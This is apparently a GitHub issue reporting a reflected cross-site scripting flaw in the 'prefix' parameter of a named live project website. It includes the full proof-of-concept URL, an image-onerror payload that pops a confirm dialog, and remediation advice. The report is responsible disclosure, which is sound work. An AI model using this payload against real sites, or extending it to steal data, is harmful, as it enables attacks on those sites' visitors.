Open xElkomy opened 3 years ago
Hello Security Team today I found Reflected XSS on your own website
1-Got this Url: https://illumina.github.io/PlatinumGenomes/?prefix= 2-Add Payload XSS In Parameter prefix Done Exploit
https://illumina.github.io/PlatinumGenomes/?prefix=
prefix
https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E
1'"<Img Src OnError=confirm('xElkomy')>
Delete the reflect for prefix parameter Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.
Steps:-
1-Got this Url:
https://illumina.github.io/PlatinumGenomes/?prefix=
2-Add Payload XSS In Parameterprefix
Done ExploitExample:-
https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E
payload:
1'"<Img Src OnError=confirm('xElkomy')>
Fix:-
Delete the reflect for prefix parameter Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.